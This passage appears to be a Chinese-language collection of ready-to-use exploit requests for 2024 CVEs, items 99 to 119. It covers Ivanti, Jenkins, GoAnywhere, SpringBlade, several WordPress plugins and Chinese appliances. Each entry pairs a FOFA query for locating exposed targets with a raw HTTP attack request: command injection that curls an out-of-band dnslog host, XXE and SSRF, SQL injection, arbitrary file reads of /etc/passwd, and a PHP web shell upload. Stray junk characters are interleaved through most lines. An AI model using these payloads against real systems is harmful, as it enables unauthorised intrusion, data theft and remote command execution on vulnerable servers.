CVE-2024-0305
% m1 x& @" \' ^FOFA:app="Ncast-产品" && title=="高清智能录播系统"6 P+ A7 x3 O9 N9 @& B8 N$ i
POST /classes/common/busiFacade.php HTTP/1.18 ~: i+ c, [5 _: |& y2 {* R; m7 T
Host: 192.168.40.130:8080& k9 K( z, V$ R$ ^8 z8 e, q- \7 g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0- n/ s. I4 ]% _5 N3 j8 a9 z+ I+ n4 W; M
Connection: close7 z" ~7 m8 p% { E4 h5 s
Content-Length: 154& H9 \; b3 @8 ~. P( M9 _
Accept: */*/ N G4 A/ W" x- l$ y
Accept-Encoding: gzip, deflate
% K$ r2 j5 F* b3 z% `; bAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' W( `0 D3 D+ o6 O9 AContent-Type: application/x-www-form-urlencoded; charset=UTF-82 y2 X! W K+ X( \4 x
X-Requested-With: XMLHttpRequest
# U2 M# \" B/ L- S; f1 |
& i# D8 H( b; o4 ~- k- R. |% y%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
; c3 M* m9 n# r6 S: j7 T
/ L5 Q, a/ }) o' P3 O( P2 i4 d' ^+ q( o% @) Q
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传( g% [( Q7 E4 B1 O/ v9 i2 k/ o, v/ B
CVE-2024-03524 x$ F' }0 ], Y3 K" Y9 |5 ?) F
FOFA:icon_hash="874152924") }1 Y$ }7 E' y# {) y3 D. H7 k
POST /api/file/formimage HTTP/1.1
, A3 b' @* {1 d& P) fHost: 192.168.40.1308 g# h2 L! l$ w: L
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
( v" Q+ x5 H1 m' v) J" r* TConnection: close
. t* a/ Z% h1 D5 j, m% p0 t3 eContent-Length: 201
% M/ f# V5 _/ T6 f& T# I& aContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
! O' X$ _8 ]9 ^7 u9 F _2 f, lAccept-Encoding: gzip- g* n u4 j. F$ M
+ n9 |3 y3 N, v9 i! S
------WebKitFormBoundarygcflwtei) Z1 f5 ~) s' P y5 p
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
( F3 n _ }( zContent-Type: application/x-php. h6 A0 }7 S( m0 h6 A& U. U" |7 U
! Q* C( u3 e' z
2ayyhRXiAsKXL8olvF5s4qqyI2O: Y: n( k- o) Y* O7 b
------WebKitFormBoundarygcflwtei--& \& a- S& L: P/ O% Z; i2 Y# x7 b
7 @) @4 V& t& ~2 @! D, w4 [3 s6 M
101. ivanti policy secure-22.6命令注入
/ ~# i' k7 s7 T e- H/ WCVE-2024-21887% {) v# }, t$ x- `5 c* d; ]4 Q8 F- a
FOFA:body="welcome.cgi?p=logo"# a% O5 Q! y- w9 F/ n0 Y; k" t5 v
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1, V8 J j8 T3 m$ S. X8 x
Host: x.x.x.xx.x.x.x
" O# W$ P2 v* ]' JUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
& L& A+ O4 q: N' rConnection: close
7 E& S7 ^+ ^0 }. x' hAccept-Encoding: gzip
- y$ `( j0 G- A/ t$ R) S( `* }) g2 C' N
' f9 d! D* U8 d( E
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行9 |# M4 }5 g9 _6 Y- E) S8 t
CVE-2024-21893/ N0 E. h/ [. Z$ Q* ?0 g9 T
FOFA:body="welcome.cgi?p=logo"- f1 {, c( z( W. J1 i9 K. O
POST /dana-ws/saml20.ws HTTP/1.1
0 N* ?" G+ V7 H' sHost: x.x.x.x
# P, h' n" Q3 |8 x6 X2 ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36; x/ q) p5 |# J: z+ x& H) o6 P' w
Connection: close
7 d; g/ O- t: J$ n4 r" W; JContent-Length: 792
) U+ M1 i& |; uAccept-Encoding: gzip+ d* F0 i# k2 U
3 l7 b- X, H8 b% j; _/ p<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>
; d' n! g" J+ K# S9 F8 W" y$ }! X8 B2 I R! [
103. Ivanti Pulse Connect Secure VPN XXE- f) s6 W$ M% g+ e. K& y# Q5 P% Y) t
CVE-2024-22024
6 u# T8 m2 ]; M! g& K7 ]3 u, pFOFA:body="welcome.cgi?p=logo"$ H( e9 I* X& e9 M+ w. a4 p
POST /dana-na/auth/saml-sso.cgi HTTP/1.1, R+ E9 _- R4 A0 L8 V8 r- F/ S
Host: 192.168.40.130:111$ t; M4 ?) B5 Y; D
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36, R3 ]! Y" z' k* D3 E* O+ q5 {
Connection: close3 F( W, t& Y+ j# B3 ^0 h
Content-Length: 204
% ?+ v# m1 M4 e" n* r- oContent-Type: application/x-www-form-urlencoded
9 G5 K& j3 O! D( J# r5 O4 ?Accept-Encoding: gzip
' e% @- l/ \ z; f# {, C a, ~, G. x6 T" @( U- H* ]
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==( H1 ^& _# V: p1 E* r* I$ A
. a2 Y8 u& B3 {+ c' A
' h0 ]& v6 M7 L' d- j' S2 Q. h* j其中SAMLRequest的值是xml文件内容的base64值,xml文件如下 N" k+ o/ \, i* e
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>8 ]5 w7 z1 D; c, g
: k }, _! y; g, j; P( p; U+ H( a) ?
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
0 C0 T2 ~/ g1 A0 y6 b0 fCVE-2024-0569
6 H" l, M& E' k9 N3 J2 y2 y) N& [: aFOFA:title="TOTOLINK", r# B+ }# A4 k- k" |7 m5 \+ q
POST /cgi-bin/cstecgi.cgi HTTP/1.11 N: Q0 F! r6 J. ~5 ^) Q
Host:192.168.0.1
/ _4 i( S5 t+ y! xContent-Length:41
5 A- S: k% L. t/ J( F* I KAccept:application/json,text/javascript,*/*;q=0.01, M. E: C* E0 P) N' ]2 i' c
X-Requested-with: XMLHttpRequest- q$ A, l6 S! }, J
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
1 R$ k. V P# k! LContent-Type: application/x-www-form-urlencoded:charset=UTF-8
2 J l. |! A' i2 qOrigin: http://192.168.0.1
G) L- k2 U6 E! yReferer: http://192.168.0.1/advance/index.html?time=1671152380564* ]. j* T: ]1 b3 A5 m, y
Accept-Encoding:gzip,deflate
3 Z; C, k( q7 J" [2 p6 yAccept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
4 G1 Z U7 H9 sConnection:close
: |& m" |8 A6 O+ F
: \% ]) q& \" l5 I2 d6 y5 u{3 e- g1 g( v0 [/ r
"topicurl":"getSysStatusCfg", @' ]* X8 m: ^* g; P! ^, H& c; G1 `
"token":""; M& G- G7 ?! v D0 V
}3 W0 J2 @, g! O" ~8 Z$ [7 l
( G) f) ^& P/ e7 f) V- k1 M1 _105. SpringBlade v3.2.0 export-user SQL 注入
" [. O5 m2 m* fFOFA:body="https://bladex.vip"2 f* _, L0 H& j2 S
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=16 Q1 e2 L8 V) {& q
2 l/ c5 U' T0 E) {3 Y
106. SpringBlade dict-biz/list SQL 注入+ S2 f. y+ i: }- Y1 o
FOFA:body="Saber 将不能正常工作"
" ]6 C' ~4 [1 K, h6 bGET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
9 o$ A2 g! ?0 [% nHost: your-ip
9 X; u$ h+ V4 D1 b- H4 X6 m' P2 GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36$ v4 y/ i/ }/ |- S, u
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
* r N7 S( @ G, }# E1 Y. X7 U7 IAccept-Encoding: gzip, deflate
9 M T, S1 N7 a w% D& H1 F dAccept-Language: zh-CN,zh;q=0.9" K' j0 H3 P) \. \7 A; g
Connection: close4 X5 M0 C( E, j% E h( ^+ z
' i8 I& I. D7 y! c- U( C; T5 p
0 U1 m& Q7 }% H. o u1 d8 U107. SpringBlade tenant/list SQL 注入
# C0 {: Z+ u0 c; ~3 }# d- ?6 J5 kFOFA:body="https://bladex.vip"
9 G) q! |5 l3 V+ Z! xGET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1, b# h" Z, D n& k0 t5 I3 J
Host: your-ip
1 o6 ?" w- H3 @+ K+ WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
2 Q, B: H" w+ a( W8 X6 TBlade-Auth:替换为自己的
8 s) P# U0 m( ` E# ?Connection: close
0 g2 I6 [, P4 i- D
4 @' E4 n4 Q6 s8 K8 ]! w
: C! \2 g3 O2 p9 a108. D-Tale 3.9.0 SSRF
! m4 q$ G, K) K4 }CVE-2024-21642" y, x8 O0 C2 y- {' ~0 [+ i
FOFA:"dtale/static/images/favicon.png"
( s5 \. z+ J9 R0 E% Q$ \3 I3 _GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
; U% C# S/ i7 m' _2 j$ g$ VHost: your-ip
! k6 e- {. x7 G$ e8 _7 o9 y0 DAccept: application/json, text/plain, */*/ J" u! ~5 j) N; t1 S9 Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
- V$ B; \7 o" k% ] f" U6 T7 M1 rAccept-Encoding: gzip, deflate/ w' N. ~2 [. i" w' w: C* H2 k" P
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
& q# N7 _+ }& @" dConnection: close' h! [3 @, S3 X* p* _9 ^2 E! k8 v9 s
( [8 ~- h A2 I! \3 I* g3 V/ a
7 [+ w4 \) ], q* ^109. Jenkins CLI 任意文件读取- H; R, g4 c. a, C
CVE-2024-23897* T5 Q6 g. K: B! E2 Y# E+ O: l
FOFA:header="X-Jenkins"6 @- B6 r8 u# S9 l5 z I( @- o
POST /cli?remoting=false HTTP/1.1
( c9 g* p+ w D u+ oHost:
$ d! }) F8 E/ C' U' o3 ~; pContent-type: application/octet-stream! k7 ` H; g1 T% |5 k
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92! K d( b) G. C/ U) Q
Side: upload1 S$ e, n2 F& ?" A# p( c/ e
Connection: keep-alive
& m/ b. J; _$ A8 d2 G* X. g) ~Content-Length: 163, D E+ L* d1 U( g. `- b/ n) x
! u' _5 w; i ?! x: X) @b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'1 v" G3 _# ~: q8 @
4 ?* D% O2 U) w7 S! ^( _5 e" C
2 u v8 l( y1 i2 k
POST /cli?remoting=false HTTP/1.1$ k; U% y6 [# A! v% o% j8 k# ^
Host:$ H/ K! d3 [& M6 e+ |" L
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92; {; h9 x7 e1 }# m9 Y9 i1 {: d
download y5 C; g9 X5 V# |' D2 k! R
Content-Type: application/x-www-form-urlencoded; Y* t/ V* e, N& I E$ S |
Content-Length: 0
; Q5 ~8 D& W- ~$ R7 P4 ^7 j
7 j5 m6 D; s& J5 ?
& L7 y9 c( _6 V) O: {3 yERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
; i: N7 M. [0 ?2 w1 Y! p1 Hjava -jar jenkins-cli.jar help
3 }% f% e4 \( c3 W% |' m4 O6 p$ b0 o. W6 b[COMMAND]
% t; g3 x1 [, c& q% T8 GLists all the available commands or a detailed description of single command.6 q7 o. s& b6 V6 d4 m
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)% R; d: g, B4 X' p! l) v; `# A
- X5 g/ N+ ?, Z4 S+ i) r: Q O3 y# g/ ^. y, m, _
110. Goanywhere MFT 未授权创建管理员6 j1 l# V/ Z8 c! D
CVE-2024-0204
' `# S- l: `+ f1 [9 v RFOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
- C& k* x/ S2 l- HGET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
, X5 i) |! q) ]; W% Q3 C0 W6 vHost: 192.168.40.130:8000! q7 @% b. ?* ~4 p
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
$ J# j8 \) ?2 w5 _, p2 u! LConnection: close
- K) M( ~2 x6 l/ ~" aAccept: */*
# B5 G$ ` [$ qAccept-Language: en! G- K1 X& b# I$ f e5 L- j, m; R% w
Accept-Encoding: gzip/ w1 Q9 b, e6 w- L2 P/ {
% p# F' G* J9 M
$ J: U- O. Q9 c/ @2 f+ N% `111. WordPress Plugin HTML5 Video Player SQL注入
( Z4 p" T+ L0 X1 T# }5 @ \CVE-2024-1061
: T8 R8 p) t3 Y0 Y' t- f6 [( OFOFA:"wordpress" && body="html5-video-player"
s& L: l% I6 T5 D& K' VGET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1+ t+ i7 [: P2 m
Host: 192.168.40.130:112
* X( N5 g q9 {" yUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
/ M: H S0 j% k1 n* N! b. iConnection: close$ Z8 l& R6 J! o$ `7 s4 @8 o
Accept: */*, i+ Y3 ?' C0 Q" v Y1 a& I( C$ q
Accept-Language: en
% A: e& M3 t7 TAccept-Encoding: gzip
* E* [8 E2 L1 E& N
' R( r( W( U( [& o* u7 [8 C- r4 a) H3 L7 L6 U
112. WordPress Plugin NotificationX SQL 注入
2 E/ [; f# c- PCVE-2024-1698
. C/ P; _- t* V% F0 E0 Y9 _! c* EFOFA:body="/wp-content/plugins/notificationx"
" K" }+ A9 A' S: \' wPOST /wp-json/notificationx/v1/analytics HTTP/1.1
! \) ]7 U+ v3 v6 \2 ~8 w2 AHost: {{Hostname}}$ q7 s: {/ ?, @; l
Content-Type: application/json
, _% Q5 P" J# J) Z1 u
+ j @9 S9 ^! W+ y. v4 B: c5 n{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
; V0 |, s& S7 _5 A, o$ O( u @" Y, ?0 r, I. Q+ C
0 ^7 C) E; r3 V3 ^" G113. WordPress Automatic 插件任意文件下载和SSRF
, a% x! E0 F4 q# B/ A P# ]/ BCVE-2024-27954% N: c/ N5 Y: a y1 [$ x
FOFA:"/wp-content/plugins/wp-automatic"
8 W h% M/ p2 c( B! N0 ?8 OGET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
- c3 P+ X' x* _& AHost: x.x.x.x* }. w- ~+ n( ^2 Y4 z
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
7 V; s1 H* b: x" BConnection: close* i) Y. c' j& p$ U- o5 k, A2 Q
Accept: */*) m# o7 w0 }4 h# A3 q! h
Accept-Language: en5 j. h7 s' y4 N \9 p' p, v; ?
Accept-Encoding: gzip" {: [1 `; x* F: V$ M" S1 d$ V7 T' k% S* N
9 t+ y. t8 U2 N# r0 [ |4 H! y c6 T0 [$ G" m: v
114. WordPress MasterStudy LMS插件 SQL注入8 K0 [* I1 M: c% q' ~
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"# t9 K+ o' B: `% E" C
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1! l2 X( c( T5 N: O6 Z& @
Host: your-ip
1 I6 x* J3 i. u/ M- U4 B* D9 tUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
R( D0 K% ?( P- y7 M) ~# zAccept-Charset: utf-88 |+ S" W9 ]1 y! P
Accept-Encoding: gzip, deflate
0 }0 R) E c" V s' m$ ]% d" XConnection: close y" l1 Z& \- i$ E! o1 f9 t
2 k& x1 }* b/ W& {3 R( @/ r: V
, f `3 J9 X0 j- q4 O0 R115. WordPress Bricks Builder <= 1.9.6 RCE
9 B: T- F+ r) J4 ^% |; @1 `) E; VCVE-2024-25600
" ]7 x+ Z1 U, Z8 PFOFA: body="/wp-content/themes/bricks/"; s+ N y7 t6 F: N2 T# M: Y
第一步,获取网站的nonce值
/ L$ B `) y; T7 }GET / HTTP/1.13 H3 ~" s6 b( h/ {8 z3 \* Q3 C: r
Host: x.x.x.x
" M- u' {$ b- T" `+ VUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36% {+ [' R% c) F! Z
Connection: close
# B# l2 p- b6 ^# P7 PAccept-Encoding: gzip5 [3 x, P5 x% n" U4 P. w
% X" m$ f4 s. c! A; l, q- b+ A
5 O! g) M, V5 C7 f" y% r; K5 J# N' N5 h第二步替换nonce值,执行命令
; t7 W8 v* d; gPOST /wp-json/bricks/v1/render_element HTTP/1.15 k( o" b8 q- p1 \. R
Host: x.x.x.x
! M% I9 S& Z8 F7 h1 r* r* V, s; FUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36& A# l) u, H; {7 D, h
Connection: close
2 [( s0 {0 n8 JContent-Length: 356
" E8 d# I- x* N$ SContent-Type: application/json
" h$ }+ i- k- p: ZAccept-Encoding: gzip9 n+ g7 J5 b- v7 z
/ \1 P+ T5 w8 m5 X( }7 r6 w. j
{# B: M& Q' ]" Z. X j8 k
"postId": "1",* L& m3 G# I% h3 b: r
"nonce": "第一步获得的值",7 ]# U, _+ @, }! k1 \
"element": {& n6 Q. G. i' I6 e1 K
"name": "container",
) k9 W1 b+ o: X) J' ^/ u "settings": {
) j& l3 ]1 w+ i( H) l9 N "hasLoop": "true",
; i$ O, l% ~# F0 N "query": {
* e$ `, Z0 R2 ^ t0 ? "useQueryEditor": true,
/ O+ w, o, ?8 c9 y, e "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",# j6 a. T6 k. B. }9 u
"objectType": "post"
$ x8 [8 h( N7 o. O( G: C/ [% `) Z }
+ `0 P1 z$ i9 |& h# S) O! x8 r9 C }4 B9 Q2 I. K% S! S' ]
}
0 X V. J" v8 C5 h8 K2 n" M, N! v}4 D6 i" A( G/ x) k* m
& ~- y) |$ k6 p3 }, N# n4 u& o- Q* z: [4 o
116. wordpress js-support-ticket文件上传 Z& M. k5 R. @! d# T
FOFA:body="wp-content/plugins/js-support-ticket"
5 ]3 i2 h8 s4 f! F* b! d# G1 x( qPOST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1* f4 R% S! _8 {& u4 K1 ]
Host:8 ?2 X7 u& Z2 ^4 C( \" l l* n
Content-Type: multipart/form-data; boundary=--------767099171
9 Y% n) z9 U3 v4 SUser-Agent: Mozilla/5.0- p: \" F# B# e8 r0 h" N
2 T- `; p: T. [% R' [----------767099171
1 B. V: k0 W* |# _: D; ?Content-Disposition: form-data; name="action"
, y+ f! f) G* e' K& W: Qconfiguration_saveconfiguration8 I1 }8 T4 L& ]" @! A# T' G
----------767099171
1 o4 j4 I3 S5 x" qContent-Disposition: form-data; name="form_request"& R" o3 N9 ~ O/ e
jssupportticket& a2 L$ T! k6 |# I
----------7670991715 O* S3 r r5 p% S
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
" T" p2 x, K4 ~' ^, r y% ^% E# p+ cContent-Type: image/png2 p9 {; a2 d, y6 O8 F. P# h; s* _
----------767099171--6 _0 Z- c$ {3 [: l7 p g
- h2 A0 ]9 M8 H: M6 Y1 `" E9 z
" \0 Y% l3 x6 _: p/ q* q l2 `0 D& Z117. WordPress LayerSlider插件SQL注入: k# W- F! g' _* U4 `2 H0 c
version:7.9.11 – 7.10.0* p) t& L' J# h% _3 b) F
FOFA:body="/wp-content/plugins/LayerSlider/"/ F! j6 ]. s5 G/ X
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.12 N. b/ f4 |' {' l9 n' \
Host: your-ip
3 q) a& ?; |) {8 e) S1 C% kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0- A1 q1 D) p6 y, ]& W
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 I2 i. P( p8 j$ n6 L' s ^% O2 |
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! p. s/ N( [" F6 U, U
Accept-Encoding: gzip, deflate, br
5 S4 V, ?# E3 D7 e9 e! T1 Q. QConnection: close
' M) x' }7 b+ C- W5 d% iUpgrade-Insecure-Requests: 1
5 h5 x6 i" i4 [, P0 h& ?; Q4 A1 s1 @+ a6 W5 F; z4 x
. E7 r( y. q( r# x4 a118. 北京百绰智能S210管理平台uploadfile.php任意文件上传. N! j! T: ~/ ?0 {/ H3 M! |
CVE-2024-0939 X' l! v |- o' G1 J4 O8 a, v5 K
FOFA:title="Smart管理平台"
2 S9 V: N, r# n5 |6 {( ?! }5 @POST /Tool/uploadfile.php? HTTP/1.1
! ^3 C: h& Z2 |Host: 192.168.40.130:8443# j& {. f: n4 @8 Q
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f81 y; {3 j6 G8 G# n8 e3 U9 Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
9 E' \4 w/ i aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.87 V: v2 b# n" l& j
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 y, D* ~% P& Y
Accept-Encoding: gzip, deflate
4 g* P6 Z2 C! n4 ~- |Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887) c1 \4 e7 y, s, v$ E# H
Content-Length: 405
$ S# V+ V) ?2 {! K5 L1 }) l, kOrigin: https://192.168.40.130:8443& S& j3 B2 P( r
Referer: https://192.168.40.130:8443/Tool/uploadfile.php; U* x/ ]+ g% l/ f
Upgrade-Insecure-Requests: 15 o5 ^% @2 P% Q0 @; n
Sec-Fetch-Dest: document9 ^# s- M- W7 v8 p
Sec-Fetch-Mode: navigate
: v/ ]+ C4 v5 A R5 Z5 K: [Sec-Fetch-Site: same-origin3 a$ D9 j+ V7 W
Sec-Fetch-User: ?11 t" j w: F0 t5 a) o) {4 [6 F
Te: trailers7 a, l, k2 f2 w, u: e' L
Connection: close+ u) C( S3 E T1 a: ^
& B7 S0 z& ^' r0 o-----------------------------13979701222747646634037182887. P' K% A* l! q2 B8 @; C
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
+ E9 L" w, ?" P& c5 M, d: FContent-Type: application/octet-stream! V& o' R6 Q1 P* l+ n4 L5 q
5 h0 c: N# C0 i
<?php* b5 D& y. K. y2 {2 M
system($_POST["passwd"]);3 G4 k3 b9 o; T7 z& B2 t) R
?>4 R; `4 @" Y _3 e: Z. A
-----------------------------13979701222747646634037182887
) E4 U9 ?5 I/ o- {6 KContent-Disposition: form-data; name="txt_path"" ~: K. f) k3 M7 G, c* k4 P
: g/ G3 s$ H, f, c1 B/ U$ Y/home/src.php4 A6 o, T2 Q# h9 Z' r& Y! Q5 H) b; j, K
-----------------------------13979701222747646634037182887-- t5 K, p* s9 v9 f
: m# z1 [5 C+ G9 m1 ]0 Z
* n m/ ~7 U3 d访问/home/src.php
6 b9 v) j1 K) g( k& @6 o' B4 Z3 [6 @) c
119. 北京百绰智能S20后台sysmanageajax.php sql注入/ F+ J$ l0 C" J. e, H2 }' N
CVE-2024-1254
n# i, i3 w: i. x& ?+ c# sFOFA:title="Smart管理平台"6 l. h) `3 V: J& j4 }
先登录进入系统,默认账号密码为admin/admin
& u" g0 k' o" C' `. kPOST /sysmanage/sysmanageajax.php HTTP/1.11
u7 q/ W* a' {9 `8 J' v6 M8 ZHost: x.x.x.x
2 c! c+ t {& [% eCookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee6 g D# h% @5 E+ M6 |* Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
! u, Y* P w4 u0 y. YAccept: */*6 r) K- L) f, ]
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 \, X6 D2 P1 ]6 [6 [ K* [' c
Accept-Encoding: gzip, deflate
) q/ w) {2 s* u- N" J- hContent-Type: application/x-www-form-urlencoded;* v7 f" ^" p- R! T5 a) o+ X
Content-Length: 109
7 C, E7 v# ?; n% B) IOrigin: https://58.18.133.60:8443& c, H: T' ]% A
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
5 }, i8 m3 V- w* |! ?2 p) R& e. F. {" @& oSec-Fetch-Dest: empty
" z$ X. E) L/ T+ o2 b" fSec-Fetch-Mode: cors- W' ^9 b! t$ U7 v- \1 n' B/ n
Sec-Fetch-Site: same-origin0 h4 u4 ]4 U$ ~) I! Z# t$ P4 F
X-Forwarded-For: 1.1.1.1
: E' L j+ r9 U2 XX-Originating-Ip: 1.1.1.1
: M! m% V% _! t9 r6 z+ hX-Remote-Ip: 1.1.1.1
4 N* M; e) Z, P+ o8 b; m$ E) `" A2 `! sX-Remote-Addr: 1.1.1.1
+ M8 [# X W; C0 L8 a4 vTe: trailers% O! n* i& u5 U; R! T0 i3 L
Connection: close) h8 j" t0 A ?* H( P+ L4 |9 ~
: y* n' ?: C+ L* M- s, X7 N( ~src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
5 j! z. q! u+ p0 g
